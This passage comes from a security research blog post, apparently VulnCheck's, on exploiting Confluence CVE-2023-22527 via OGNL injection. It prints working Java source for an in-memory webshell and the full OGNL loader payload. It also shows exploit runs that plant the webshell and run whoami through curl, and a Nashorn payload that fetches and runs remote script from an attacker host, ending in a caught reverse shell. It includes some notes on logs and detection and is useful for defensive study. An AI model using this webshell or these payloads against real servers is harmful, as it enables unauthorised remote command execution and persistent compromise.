Sigma rules and leave (as implemented) very obvious log traces. But we can load anything we want! Let’s move on to something more stealthy: an in-memory webshell.",[993,74738,74740],{"id":74739},"loading-a-webshell","Loading a Webshell",[18,74742,74743,74744,74747,74748,59],{},"Loading the webshell builds on the previous example. Exploitation is almost the same (using ",[886,74745,74746],{},"ReflectUtils.DefineClass"," to load a pre-defined byte string), but the Java payload is significantly different. To demonstrate this, we shared a second proof of concept that you can find ",[47,74749,305],{"href":74750,"rel":74751},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain\u002Fwebshell",[51],[18,74753,74754,74755,74758,74759,74763,74764,74767],{},"The biggest difference is the inclusion of ",[886,74756,74757],{},"ABCDEFG.java"," which is a class that implements ",[47,74760,74291],{"href":74761,"rel":74762},"https:\u002F\u002Fdocs.oracle.com\u002Fjavaee%2F7%2Fapi%2F%2F\u002Fjavax\u002Fservlet\u002FServletRequestListener.html",[51],". This is compiled into a class using ",[886,74765,74766],{},"javac"," and then embedded into the go-exploit (the ridiculous name ABCDEFG is overwritten with a random name generated by the exploit):",[18,74769,74770,74771,74773,74774,74779,74780,74782],{},"Being a ",[886,74772,74291],{}," allows the class to handle inbound HTTP requests via the ",[47,74775,74778],{"href":74776,"rel":74777},"https:\u002F\u002Fdocs.oracle.com\u002Fjavaee%2F7%2Fapi%2F%2F\u002Fjavax\u002Fservlet\u002FServletRequestListener.html#requestInitialized-javax.servlet.ServletRequestEvent-",[51],"requestInitialized"," method. But it isn’t enough to implement ",[886,74781,74291],{},": the class needs to register as an event listener. This is done in the class’s constructor:",[1354,74784,74786],{"className":27194,"code":74785,"language":27196,"meta":219,"style":219},"public ABCDEFG(ServletContext context) {\n try {\n addListener(this, getFieldValue(getFieldValue(context,\"context\"), \"context\"));\n } catch (Throwable e) {\n }\n}\n\nprivate void addListener(Object listener, Object standardContext) throws Exception {\n Method addApplicationEventListenerMethod = standardContext.getClass().getDeclaredMethod(\"addApplicationEventListener\", Object.class);\n addApplicationEventListenerMethod.setAccessible(true);\n addApplicationEventListenerMethod.invoke(standardContext, listener);\n}\n",[886,74787,74788,74807,74813,74856,74873,74877,74881,74885,74918,74959,74975,74995],{"__ignoreMap":219},[1373,74789,74790,74792,74795,74797,74800,74803,74805],{"class":1375,"line":1376},[1373,74791,15019],{"class":4652},[1373,74793,74794],{"class":7297}," ABCDEFG",[1373,74796,1384],{"class":1383},[1373,74798,74799],{"class":27228},"ServletContext",[1373,74801,74802],{"class":4640}," context",[1373,74804,2230],{"class":1383},[1373,74806,4765],{"class":1383},[1373,74808,74809,74811],{"class":1375,"line":220},[1373,74810,11752],{"class":4636},[1373,74812,4765],{"class":1383},[1373,74814,74815,74818,74820,74823,74825,74828,74830,74833,74835,74838,74840,74842,74844,74846,74848,74850,74852,74854],{"class":1375,"line":1266},[1373,74816,74817],{"class":7297}," addListener",[1373,74819,1384],{"class":1383},[1373,74821,74822],{"class":34505},"this",[1373,74824,5437],{"class":1383},[1373,74826,74827],{"class":7297}," getFieldValue",[1373,74829,1384],{"class":1383},[1373,74831,74832],{"class":7297},"getFieldValue",[1373,74834,1384],{"class":1383},[1373,74836,74837],{"class":4640},"context",[1373,74839,5437],{"class":1383},[1373,74841,183],{"class":1387},[1373,74843,74837],{"class":1391},[1373,74845,183],{"class":1387},[1373,74847,15534],{"class":1383},[1373,74849,4883],{"class":1387},[1373,74851,74837],{"class":1391},[1373,74853,183],{"class":1387},[1373,74855,1413],{"class":1383},[1373,74857,74858,74860,74862,74864,74867,74869,74871],{"class":1375,"line":1852},[1373,74859,28032],{"class":1383},[1373,74861,28035],{"class":4636},[1373,74863,4641],{"class":1383},[1373,74865,74866],{"class":27228},"Throwable",[1373,74868,28042],{"class":19096},[1373,74870,2230],{"class":1383},[1373,74872,4765],{"class":1383},[1373,74874,74875],{"class":1375,"line":4692},[1373,74876,4795],{"class":1383},[1373,74878,74879],{"class":1375,"line":4724},[1373,74880,1855],{"class":1383},[1373,74882,74883],{"class":1375,"line":4756},[1373,74884,6520],{"emptyLinePlaceholder":237},[1373,74886,74887,74889,74892,74895,74897,74900,74903,74905,74908,74911,74913,74916],{"class":1375,"line":4768},[1373,74888,16703],{"class":4652},[1373,74890,74891],{"class":7293}," void",[1373,74893,74894],{"class":7297}," addListener",[1373,74896,1384],{"class":1383},[1373,74898,74899],{"class":27228},"Object",[1373,74901,74902],{"class":4640}," listener",[1373,74904,5437],{"class":1383},[1373,74906,74907],{"class":27228}," Object",[1373,74909,74910],{"class":4640}," standardContext",[1373,74912,2230],{"class":1383},[1373,74914,74915],{"class":4640}," throws Exception ",[1373,74917,8904],{"class":1383},[1373,74919,74920,74923,74926,74928,74930,74932,74935,74937,74940,74942,74944,74947,74949,74951,74953,74955,74957],{"class":1375,"line":4792},[1373,74921,74922],{"class":27228}," Method",[1373,74924,74925],{"class":4640}," addApplicationEventListenerMethod ",[1373,74927,5417],{"class":1397},[1373,74929,74910],{"class":4640},[1373,74931,59],{"class":1383},[1373,74933,74934],{"class":7297},"getClass",[1373,74936,16355],{"class":1383},[1373,74938,74939],{"class":7297},"getDeclaredMethod",[1373,74941,1384],{"class":1383},[1373,74943,183],{"class":1387},[1373,74945,74946],{"class":1391},"addApplicationEventListener",[1373,74948,183],{"class":1387},[1373,74950,5437],{"class":1383},[1373,74952,74907],{"class":4640},[1373,74954,59],{"class":1383},[1373,74956,27318],{"class":4640},[1373,74958,4680],{"class":1383},[1373,74960,74961,74964,74966,74969,74971,74973],{"class":1375,"line":4798},[1373,74962,74963],{"class":4640}," addApplicationEventListenerMethod",[1373,74965,59],{"class":1383},[1373,74967,74968],{"class":7297},"setAccessible",[1373,74970,1384],{"class":1383},[1373,74972,10874],{"class":7054},[1373,74974,4680],{"class":1383},[1373,74976,74977,74979,74981,74984,74986,74989,74991,74993],{"class":1375,"line":4806},[1373,74978,74963],{"class":4640},[1373,74980,59],{"class":1383},[1373,74982,74983],{"class":7297},"invoke",[1373,74985,1384],{"class":1383},[1373,74987,74988],{"class":4640},"standardContext",[1373,74990,5437],{"class":1383},[1373,74992,74902],{"class":4640},[1373,74994,4680],{"class":1383},[1373,74996,74997],{"class":1375,"line":4817},[1373,74998,1855],{"class":1383},[18,75000,75001,75002,75007,75008,75013,75014,75016],{},"The constructor expects the caller to provide a ",[47,75003,75006],{"href":75004,"rel":75005},"https:\u002F\u002Fdocs.oracle.com\u002Fjavaee\u002F6\u002Fapi\u002Fjavax\u002Fservlet\u002FServletContext.html",[51],"javax.servlet.ServletContext",", from which it extracts the underlying Tomcat ",[47,75009,75012],{"href":75010,"rel":75011},"https:\u002F\u002Ftomcat.apache.org\u002Ftomcat-8.0-doc\u002Fapi\u002Forg\u002Fapache\u002Fcatalina\u002Fcore\u002FStandardContext.html",[51],"StandardContext"," and invokes ",[886,75015,74946],{}," to register for events.",[18,75018,2245,75019,75021],{},[886,75020,74799],{}," is sourced from the exploit’s OGNL expression. See the full payload below (with class bytes removed):",[1925,75023,75024],{},[18,75025,75026],{},[886,75027,75028],{},"weZ=(@org.springframework.cglib.core.ReflectUtils@defineClass('AgzJWbvprnpCqo', @org.springframework.util.Base64Utils@decodeFromString('classbytes…'), @java.lang.Thread@currentThread().getContextClassLoader())).getDeclaredConstructors[0].newInstance( @org.apache.struts2.ServletActionContext@getRequest().getServletContext())& label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.weZ,{})+\\u0027",[18,75030,75031,75032,75034,75035,75038,75039,75041,75042,75045,75046,59],{},"Instead of using ",[886,75033,74469],{}," like we did in the previous exploit, we’ve switched to ",[886,75036,75037],{},"getDeclaredConstructors[0].newInstance"," to pass the ",[886,75040,74799],{}," parameter. That parameter is generated by extracting the context from ",[886,75043,75044],{},"getRequest",". In the payload above, that looks like the following: ",[886,75047,75048],{},"@org.apache.struts2.ServletActionContext@getRequest().getServletContext()",[18,75050,75051,75052,75055],{},"The result is the class can then intercept any HTTP request to Confluence. ",[886,75053,75054],{},"ABCDEFG.class"," implements a very simple webshell that looks for a specific request parameter to intercept and execute (the exploit overwrites the parameter with a random value before implanting the webshell):",[1354,75057,75059],{"className":27194,"code":75058,"language":27196,"meta":219,"style":219},"@Override\npublic void requestInitialized(ServletRequestEvent sret) {\n try {\n ServletRequest request = sret.getServletRequest();\n String cmd = request.getParameter(\"AAAAAAAAAAAA\");\n if (cmd != null) {\n ServletResponse response = (ServletResponse)getFieldValue(getFieldValue(request, \"request\"), \"response\");\n PrintWriter printWriter = response.getWriter();\n Process p = Runtime.getRuntime().exec(cmd);\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while (disr != null) {\n printWriter.write(disr);\n disr = dis.readLine();\n }\n printWriter.flush();\n printWriter.close();\n }\n }\n catch (Exception e) {\n }\n}\n",[886,75060,75061,75068,75089,75095,75114,75142,75159,75206,75225,75250,75270,75288,75309,75328,75346,75363,75378,75382,75394,75405,75409,75413,75428,75432],{"__ignoreMap":219},[1373,75062,75063,75065],{"class":1375,"line":1376},[1373,75064,7318],{"class":1383},[1373,75066,75067],{"class":7293},"Override\n",[1373,75069,75070,75072,75074,75077,75079,75082,75085,75087],{"class":1375,"line":220},[1373,75071,15019],{"class":4652},[1373,75073,74891],{"class":7293},[1373,75075,75076],{"class":7297}," requestInitialized",[1373,75078,1384],{"class":1383},[1373,75080,75081],{"class":27228},"ServletRequestEvent",[1373,75083,75084],{"class":4640}," sret",[1373,75086,2230],{"class":1383},[1373,75088,4765],{"class":1383},[1373,75090,75091,75093],{"class":1375,"line":1266},[1373,75092,11752],{"class":4636},[1373,75094,4765],{"class":1383},[1373,75096,75097,75100,75103,75105,75107,75109,75112],{"class":1375,"line":1852},[1373,75098,75099],{"class":27228}," ServletRequest",[1373,75101,75102],{"class":4640}," request ",[1373,75104,5417],{"class":1397},[1373,75106,75084],{"class":4640},[1373,75108,59],{"class":1383},[1373,75110,75111],{"class":7297},"getServletRequest",[1373,75113,15603],{"class":1383},[1373,75115,75116,75118,75121,75123,75126,75128,75131,75133,75135,75138,75140],{"class":1375,"line":4692},[1373,75117,27368],{"class":27228},[1373,75119,75120],{"class":4640}," cmd ",[1373,75122,5417],{"class":1397},[1373,75124,75125],{"class":4640}," request",[1373,75127,59],{"class":1383},[1373,75129,75130],{"class":7297},"getParameter",[1373,75132,1384],{"class":1383},[1373,75134,183],{"class":1387},[1373,75136,75137],{"class":1391},"AAAAAAAAAAAA",[1373,75139,183],{"class":1387},[1373,75141,4680],{"class":1383},[1373,75143,75144,75146,75148,75151,75153,75155,75157],{"class":1375,"line":4724},[1373,75145,9773],{"class":4636},[1373,75147,4641],{"class":1383},[1373,75149,75150],{"class":4640},"cmd ",[1373,75152,15677],{"class":1397},[1373,75154,15680],{"class":7054},[1373,75156,2230],{"class":1383},[1373,75158,4765],{"class":1383},[1373,75160,75161,75164,75167,75169,75171,75174,75176,75178,75180,75182,75184,75187,75189,75191,75193,75195,75197,75199,75202,75204],{"class":1375,"line":4756},[1373,75162,75163],{"class":27228}," ServletResponse",[1373,75165,75166],{"class":4640}," response ",[1373,75168,5417],{"class":1397},[1373,75170,4641],{"class":1383},[1373,75172,75173],{"class":4640},"ServletResponse",[1373,75175,2230],{"class":1383},[1373,75177,74832],{"class":7297},[1373,75179,1384],{"class":1383},[1373,75181,74832],{"class":7297},[1373,75183,1384],{"class":1383},[1373,75185,75186],{"class":4640},"request",[1373,75188,5437],{"class":1383},[1373,75190,4883],{"class":1387},[1373,75192,75186],{"class":1391},[1373,75194,183],{"class":1387},[1373,75196,15534],{"class":1383},[1373,75198,4883],{"class":1387},[1373,75200,75201],{"class":1391},"response",[1373,75203,183],{"class":1387},[1373,75205,4680],{"class":1383},[1373,75207,75208,75211,75214,75216,75218,75220,75223],{"class":1375,"line":4768},[1373,75209,75210],{"class":27228}," PrintWriter",[1373,75212,75213],{"class":4640}," printWriter ",[1373,75215,5417],{"class":1397},[1373,75217,57360],{"class":4640},[1373,75219,59],{"class":1383},[1373,75221,75222],{"class":7297},"getWriter",[1373,75224,15603],{"class":1383},[1373,75226,75227,75230,75232,75234,75236,75238,75240,75242,75244,75246,75248],{"class":1375,"line":4792},[1373,75228,75229],{"class":27228}," Process",[1373,75231,27886],{"class":4640},[1373,75233,5417],{"class":1397},[1373,75235,27891],{"class":4640},[1373,75237,59],{"class":1383},[1373,75239,27896],{"class":7297},[1373,75241,16355],{"class":1383},[1373,75243,27901],{"class":7297},[1373,75245,1384],{"class":1383},[1373,75247,17653],{"class":4640},[1373,75249,4680],{"class":1383},[1373,75251,75252,75255,75258,75260,75263,75265,75268],{"class":1375,"line":4798},[1373,75253,75254],{"class":27228}," OutputStream",[1373,75256,75257],{"class":4640}," os ",[1373,75259,5417],{"class":1397},[1373,75261,75262],{"class":4640}," p",[1373,75264,59],{"class":1383},[1373,75266,75267],{"class":7297},"getOutputStream",[1373,75269,15603],{"class":1383},[1373,75271,75272,75275,75277,75279,75281,75283,75286],{"class":1375,"line":4806},[1373,75273,75274],{"class":27228}," InputStream",[1373,75276,50864],{"class":4640},[1373,75278,5417],{"class":1397},[1373,75280,75262],{"class":4640},[1373,75282,59],{"class":1383},[1373,75284,75285],{"class":7297},"getInputStream",[1373,75287,15603],{"class":1383},[1373,75289,75290,75293,75296,75298,75300,75303,75305,75307],{"class":1375,"line":4817},[1373,75291,75292],{"class":27228}," DataInputStream",[1373,75294,75295],{"class":4640}," dis ",[1373,75297,5417],{"class":1397},[1373,75299,15283],{"class":4636},[1373,75301,75302],{"class":7297}," DataInputStream",[1373,75304,1384],{"class":1383},[1373,75306,63776],{"class":4640},[1373,75308,4680],{"class":1383},[1373,75310,75311,75313,75316,75318,75321,75323,75326],{"class":1375,"line":4825},[1373,75312,27555],{"class":27228},[1373,75314,75315],{"class":4640}," disr ",[1373,75317,5417],{"class":1397},[1373,75319,75320],{"class":4640}," dis",[1373,75322,59],{"class":1383},[1373,75324,75325],{"class":7297},"readLine",[1373,75327,15603],{"class":1383},[1373,75329,75330,75333,75335,75338,75340,75342,75344],{"class":1375,"line":4835},[1373,75331,75332],{"class":4636}," while",[1373,75334,4641],{"class":1383},[1373,75336,75337],{"class":4640},"disr ",[1373,75339,15677],{"class":1397},[1373,75341,15680],{"class":7054},[1373,75343,2230],{"class":1383},[1373,75345,4765],{"class":1383},[1373,75347,75348,75351,75353,75356,75358,75361],{"class":1375,"line":4843},[1373,75349,75350],{"class":4640}," printWriter",[1373,75352,59],{"class":1383},[1373,75354,75355],{"class":7297},"write",[1373,75357,1384],{"class":1383},[1373,75359,75360],{"class":4640},"disr",[1373,75362,4680],{"class":1383},[1373,75364,75365,75368,75370,75372,75374,75376],{"class":1375,"line":4849},[1373,75366,75367],{"class":4640}," disr ",[1373,75369,5417],{"class":1397},[1373,75371,75320],{"class":4640},[1373,75373,59],{"class":1383},[1373,75375,75325],{"class":7297},[1373,75377,15603],{"class":1383},[1373,75379,75380],{"class":1375,"line":4877},[1373,75381,9832],{"class":1383},[1373,75383,75384,75387,75389,75392],{"class":1375,"line":4915},[1373,75385,75386],{"class":4640}," printWriter",[1373,75388,59],{"class":1383},[1373,75390,75391],{"class":7297},"flush",[1373,75393,15603],{"class":1383},[1373,75395,75396,75398,75400,75403],{"class":1375,"line":4931},[1373,75397,75386],{"class":4640},[1373,75399,59],{"class":1383},[1373,75401,75402],{"class":7297},"close",[1373,75404,15603],{"class":1383},[1373,75406,75407],{"class":1375,"line":4947},[1373,75408,9861],{"class":1383},[1373,75410,75411],{"class":1375,"line":4952},[1373,75412,4795],{"class":1383},[1373,75414,75415,75418,75420,75422,75424,75426],{"class":1375,"line":6776},[1373,75416,75417],{"class":4636}," catch",[1373,75419,4641],{"class":1383},[1373,75421,18887],{"class":27228},[1373,75423,28042],{"class":19096},[1373,75425,2230],{"class":1383},[1373,75427,4765],{"class":1383},[1373,75429,75430],{"class":1375,"line":6781},[1373,75431,4795],{"class":1383},[1373,75433,75434],{"class":1375,"line":7524},[1373,75435,1855],{"class":1383},[18,75437,75438,75439,75444,75445,75448],{},"This is a pretty standard webshell, hardly different from the in-memory webshell described by the ",[47,75440,75443],{"href":75441,"rel":75442},"https:\u002F\u002Fmedium.com\u002F@m01e\u002Fjsp-webshell-cookbook-part-3-f2a96f3b81ad",[51],"JSP Webshell Cookbook",". But, by virtue of only being in memory, it provides a strong foothold into the victim network. Consider the following example using our ",[47,75446,22852],{"href":74750,"rel":75447},[51]," to insert the webshell.",[1354,75450,75452],{"className":31740,"code":75451,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Fwebshell$ .\u002Fbuild\u002Fcve-2023-22527_linux-arm64 -v -a -c -e -rhost 10.9.49.80 -ell\nSUCCESS -fll SUCCESS\ntime=2024-03-04T10:37:44.404-05:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.9.49.80 port=8090 verified=true\ntime=2024-03-04T10:37:44.582-05:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.9.49.80 port=8090 vulnerable=yes\ntime=2024-03-04T10:37:44.892-05:00 level=SUCCESS msg=\"In memory webshell available using KUifNtvadjt param\"\ntime=2024-03-04T10:37:44.892-05:00 level=SUCCESS msg=\"Example usage: curl -kv http:\u002F\u002F10.9.49.80:8090\u002F?KUifNtvadjt=whoami\"\n",[886,75453,75454,75477,75485,75529,75572,75598],{"__ignoreMap":219},[1373,75455,75456,75459,75461,75463,75465,75467,75469,75471,75474],{"class":1375,"line":1376},[1373,75457,75458],{"class":2206},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Fwebshell$",[1373,75460,69781],{"class":1391},[1373,75462,45584],{"class":2209},[1373,75464,74504],{"class":2209},[1373,75466,45587],{"class":2209},[1373,75468,38907],{"class":2209},[1373,75470,38910],{"class":2209},[1373,75472,75473],{"class":5467}," 10.9.49.80",[1373,75475,75476],{"class":2209}," -ell\n",[1373,75478,75479,75481,75483],{"class":1375,"line":220},[1373,75480,39062],{"class":2206},[1373,75482,67171],{"class":2209},[1373,75484,74537],{"class":1391},[1373,75486,75487,75489,75491,75494,75496,75498,75500,75502,75504,75506,75508,75510,75512,75514,75517,75519,75521,75523,75525,75527],{"class":1375,"line":1266},[1373,75488,38930],{"class":4640},[1373,75490,5417],{"class":1397},[1373,75492,75493],{"class":1391},"2024-03-04T10:37:44.404-05:00",[1373,75495,38938],{"class":4640},[1373,75497,5417],{"class":1397},[1373,75499,39062],{"class":1391},[1373,75501,38946],{"class":4640},[1373,75503,5417],{"class":1397},[1373,75505,183],{"class":1387},[1373,75507,45779],{"class":1391},[1373,75509,183],{"class":1387},[1373,75511,38991],{"class":4640},[1373,75513,5417],{"class":1397},[1373,75515,75516],{"class":1391},"10.9.49.80",[1373,75518,38999],{"class":4640},[1373,75520,5417],{"class":1397},[1373,75522,71171],{"class":1391},[1373,75524,45796],{"class":4640},[1373,75526,5417],{"class":1397},[1373,75528,45801],{"class":1391},[1373,75530,75531,75533,75535,75538,75540,75542,75544,75546,75548,75550,75552,75554,75556,75558,75560,75562,75564,75566,75568,75570],{"class":1375,"line":1852},[1373,75532,38930],{"class":4640},[1373,75534,5417],{"class":1397},[1373,75536,75537],{"class":1391},"2024-03-04T10:37:44.582-05:00",[1373,75539,38938],{"class":4640},[1373,75541,5417],{"class":1397},[1373,75543,39062],{"class":1391},[1373,75545,38946],{"class":4640},[1373,75547,5417],{"class":1397},[1373,75549,183],{"class":1387},[1373,75551,45908],{"class":1391},[1373,75553,183],{"class":1387},[1373,75555,38991],{"class":4640},[1373,75557,5417],{"class":1397},[1373,75559,75516],{"class":1391},[1373,75561,38999],{"class":4640},[1373,75563,5417],{"class":1397},[1373,75565,71171],{"class":1391},[1373,75567,45925],{"class":4640},[1373,75569,5417],{"class":1397},[1373,75571,45930],{"class":1391},[1373,75573,75574,75576,75578,75581,75583,75585,75587,75589,75591,75593,75596],{"class":1375,"line":4692},[1373,75575,38930],{"class":4640},[1373,75577,5417],{"class":1397},[1373,75579,75580],{"class":1391},"2024-03-04T10:37:44.892-05:00",[1373,75582,38938],{"class":4640},[1373,75584,5417],{"class":1397},[1373,75586,39062],{"class":1391},[1373,75588,38946],{"class":4640},[1373,75590,5417],{"class":1397},[1373,75592,183],{"class":1387},[1373,75594,75595],{"class":1391},"In memory webshell available using KUifNtvadjt param",[1373,75597,19057],{"class":1387},[1373,75599,75600,75602,75604,75606,75608,75610,75612,75614,75616,75618,75621],{"class":1375,"line":4724},[1373,75601,38930],{"class":4640},[1373,75603,5417],{"class":1397},[1373,75605,75580],{"class":1391},[1373,75607,38938],{"class":4640},[1373,75609,5417],{"class":1397},[1373,75611,39062],{"class":1391},[1373,75613,38946],{"class":4640},[1373,75615,5417],{"class":1397},[1373,75617,183],{"class":1387},[1373,75619,75620],{"class":1391},"Example usage: curl -kv http:\u002F\u002F10.9.49.80:8090\u002F?KUifNtvadjt=whoami",[1373,75622,19057],{"class":1387},[18,75624,75625,75626,75629,75630,75632,75633,75635],{},"As the exploit says, the webshell is now available at ",[886,75627,75628],{},"http:\u002F\u002F10.9.49.80:8090\u002F?KUifNtvadjt=whoami",". We can execute ",[886,75631,22876],{}," using the following ",[886,75634,1557],{}," command (note the response).",[1354,75637,75639],{"className":31740,"code":75638,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Fwebshell$ curl http:\u002F\u002F10.9.49.80:8090\u002F?KUifNtvadjt=whoami\nnt authority\\network service\n",[886,75640,75641,75650],{"__ignoreMap":219},[1373,75642,75643,75645,75647],{"class":1375,"line":1376},[1373,75644,75458],{"class":2206},[1373,75646,2222],{"class":1391},[1373,75648,75649],{"class":1391}," http:\u002F\u002F10.9.49.80:8090\u002F?KUifNtvadjt=whoami\n",[1373,75651,75652,75654,75656,75658,75660],{"class":1375,"line":220},[1373,75653,46421],{"class":2206},[1373,75655,46424],{"class":1391},[1373,75657,8943],{"class":2326},[1373,75659,74643],{"class":1391},[1373,75661,74646],{"class":1391},[18,75663,75664,75665,75668,75669,75671],{},"The webshell, still not stealthy in executing attacker-provided commands, uses ",[886,75666,75667],{},"Runtime.getRuntime().exec(cmd)",". That is enough to avoid ",[886,75670,14509],{},", though (and therefore the previous Sigma rule).",[18,75673,75674],{},[68,75675],{":width":10862,"alt":75676,"src":75677},"Tomcat spinning out whoami.exe in procom","\u002Fblog\u002Fconfluence-dreams-of-shells\u002Fconfluence-procmon-whoami.png",[18,75679,75680,75681,75683],{},"Remember, though, this is just a proof of concept. A real weaponized payload (e.g. Godzilla) won’t be using ",[886,75682,75667],{},": they’ll do everything possible to implement their entire attack flow in Java. This is pretty tough for defenders because this doesn’t leave any good Confluence logs. Perhaps the best you can do is analyze the access log for weird patterns. Our webshell leaves a pretty obvious access log signature (random param followed by command):",[1925,75685,75686],{},[18,75687,75688,75691],{},[1373,75689,75690],{},"04\u002FMar\u002F20241038:32 -0500"," - http-nio-8090-exec-1 10.9.49.81 GET \u002F?KuifNtvadjt=whoami HTTP\u002F1.1 500 73ms 39 - curl\u002F7.68.0",[993,75693,75695],{"id":75694},"staying-in-memory-using-nashorn","Staying in Memory Using Nashorn",[18,75697,75698,75699,75704],{},"Earlier, the blog mentioned that we approached this problem with Nashorn initially. (Un)fortunately, Confluence ",[47,75700,75703],{"href":75701,"rel":75702},"https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Fbundled-tomcat-and-java-versions-1005786018.html",[51],"bundles"," Java 17 since 8.2.3. Nashorn was removed in Java 15, so exploitation using the JavaScript engine is becoming irrelevant for Confluence. However, there will forever be Java 8 installs, so exploitation with Nashorn in general will never be dead—so this tidbit might be of use to someone eventually.",[18,75706,75707,75708,75711,75712,75717,75718,75723,75724,75726,75727,75729],{},"Although this blog touches on using ",[886,75709,75710],{},"applyExpressionMaxLength"," to bypass the OGNL limit, we weren’t aware of this technique originally. The go-exploit ",[47,75713,75716],{"href":75714,"rel":75715},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain\u002Fnashorn",[51],"Nashorn payload"," is quite large, so we needed a workaround. Fortunately, Nashorn supports the ",[47,75719,75722],{"href":75720,"rel":75721},"https:\u002F\u002Fwiki.openjdk.org\u002Fdisplay\u002FNashorn\u002FNashorn+extensions",[51],"load"," keyword. ",[886,75725,75722],{}," can be used to fetch a remote file that can then be executed via ",[886,75728,1380],{},". The CVE-2023-25527 exploit looks like this:",[1925,75731,75732],{},[18,75733,75734],{},[886,75735,75736],{},"label==\\u0027%2b#request\\u005b\\u0027.K%45Y_velocity.struts2.context\\u0027 \\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,%7B%7D)%2b\\u0027&x=( new javax.script.ScriptEngineManager().getEngineByName('js').eval('load(\"http:\u002F\u002F10.9.49.81:8080\u002FUOymEWIpfhgs\")'))",[18,75738,75739,75740,75743],{},"You can find the proof of concept on ",[47,75741,2485],{"href":75714,"rel":75742},[51],". The exploit spins up its own HTTP server to serve the Nashorn payload. Example usage:",[1354,75745,75747],{"className":31740,"code":75746,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Fnashorn$ sudo docker run -it --network=host nashorn -v -a -c -e -rhost 10.9.49.8\n8 -lhost 10.9.49.81 -lport 1270 -httpAddr 10.9.49.81 -ell SUCCESS -fll SUCCESS\ntime=2024-03-04T16:10:38.002Z level=SUCCESS msg=\"Target verification succeeded!\" host=10.9.49.88 port=8090 verified=true\ntime=2024-03-04T16:10:38.146Z level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.9.49.88 port=8090 vulnerable=yes\ntime=2024-03-04T16:10:40.503Z level=SUCCESS msg=\"Caught new shell from 10.9.49.88:41826\"\nid\nuid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)\n",[886,75748,75749,75780,75806,75849,75892,75918,75922],{"__ignoreMap":219},[1373,75750,75751,75754,75756,75758,75760,75762,75764,75767,75769,75771,75773,75775,75777],{"class":1375,"line":1376},[1373,75752,75753],{"class":2206},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Fnashorn$",[1373,75755,17747],{"class":1391},[1373,75757,74490],{"class":1391},[1373,75759,67145],{"class":1391},[1373,75761,74495],{"class":2209},[1373,75763,74498],{"class":2209},[1373,75765,75766],{"class":1391}," nashorn",[1373,75768,45584],{"class":2209},[1373,75770,74504],{"class":2209},[1373,75772,45587],{"class":2209},[1373,75774,38907],{"class":2209},[1373,75776,38910],{"class":2209},[1373,75778,75779],{"class":5467}," 10.9.49.8\n",[1373,75781,75782,75784,75786,75789,75791,75793,75796,75798,75800,75802,75804],{"class":1375,"line":220},[1373,75783,37681],{"class":2206},[1373,75785,38916],{"class":2209},[1373,75787,75788],{"class":5467}," 10.9.49.81",[1373,75790,38922],{"class":2209},[1373,75792,74527],{"class":5467},[1373,75794,75795],{"class":2209}," -httpAddr",[1373,75797,75788],{"class":5467},[1373,75799,67177],{"class":2209},[1373,75801,74532],{"class":1391},[1373,75803,67171],{"class":2209},[1373,75805,74537],{"class":1391},[1373,75807,75808,75810,75812,75815,75817,75819,75821,75823,75825,75827,75829,75831,75833,75835,75837,75839,75841,75843,75845,75847],{"class":1375,"line":1266},[1373,75809,38930],{"class":4640},[1373,75811,5417],{"class":1397},[1373,75813,75814],{"class":1391},"2024-03-04T16:10:38.002Z",[1373,75816,38938],{"class":4640},[1373,75818,5417],{"class":1397},[1373,75820,39062],{"class":1391},[1373,75822,38946],{"class":4640},[1373,75824,5417],{"class":1397},[1373,75826,183],{"class":1387},[1373,75828,45779],{"class":1391},[1373,75830,183],{"class":1387},[1373,75832,38991],{"class":4640},[1373,75834,5417],{"class":1397},[1373,75836,71166],{"class":1391},[1373,75838,38999],{"class":4640},[1373,75840,5417],{"class":1397},[1373,75842,71171],{"class":1391},[1373,75844,45796],{"class":4640},[1373,75846,5417],{"class":1397},[1373,75848,45801],{"class":1391},[1373,75850,75851,75853,75855,75858,75860,75862,75864,75866,75868,75870,75872,75874,75876,75878,75880,75882,75884,75886,75888,75890],{"class":1375,"line":1852},[1373,75852,38930],{"class":4640},[1373,75854,5417],{"class":1397},[1373,75856,75857],{"class":1391},"2024-03-04T16:10:38.146Z",[1373,75859,38938],{"class":4640},[1373,75861,5417],{"class":1397},[1373,75863,39062],{"class":1391},[1373,75865,38946],{"class":4640},[1373,75867,5417],{"class":1397},[1373,75869,183],{"class":1387},[1373,75871,45908],{"class":1391},[1373,75873,183],{"class":1387},[1373,75875,38991],{"class":4640},[1373,75877,5417],{"class":1397},[1373,75879,71166],{"class":1391},[1373,75881,38999],{"class":4640},[1373,75883,5417],{"class":1397},[1373,75885,71171],{"class":1391},[1373,75887,45925],{"class":4640},[1373,75889,5417],{"class":1397},[1373,75891,45930],{"class":1391},[1373,75893,75894,75896,75898,75901,75903,75905,75907,75909,75911,75913,75916],{"class":1375,"line":4692},[1373,75895,38930],{"class":4640},[1373,75897,5417],{"class":1397},[1373,75899,75900],{"class":1391},"2024-03-04T16:10:40.503Z",[1373,75902,38938],{"class":4640},[1373,75904,5417],{"class":1397},[1373,75906,39062],{"class":1391},[1373,75908,38946],{"class":4640},[1373,75910,5417],{"class":1397},[1373,75912,183],{"class":1387},[1373,75914,75915],{"class":1391},"Caught new shell from 